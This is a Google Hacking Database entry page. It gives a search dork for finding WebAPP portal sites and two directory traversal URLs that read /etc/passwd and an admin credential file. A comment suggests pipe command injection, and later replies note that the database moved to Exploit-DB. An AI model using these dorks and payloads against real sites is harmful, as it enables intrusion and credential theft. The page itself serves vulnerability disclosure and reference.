GHDB « Hackers For Charity

GHDB

GHDB

Google Search: inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca

plaztic rates this entry 8 out of 10.
Submitted: 2004-09-07 00:00:00
Added by: plaztic
Hits: 3775
Score: 8

WebAPP is advertised as the internet’s most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability.

Comments:

2005-09-01 12:15:19 (sapheal): old stuff but working ;) som3tim3s u might want to use this: |ls|
whose n00bs not involved: read bout piping commands in *nix
ps.also read bout NULL byte poison (\0).. this is a very specific command

shoutz


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply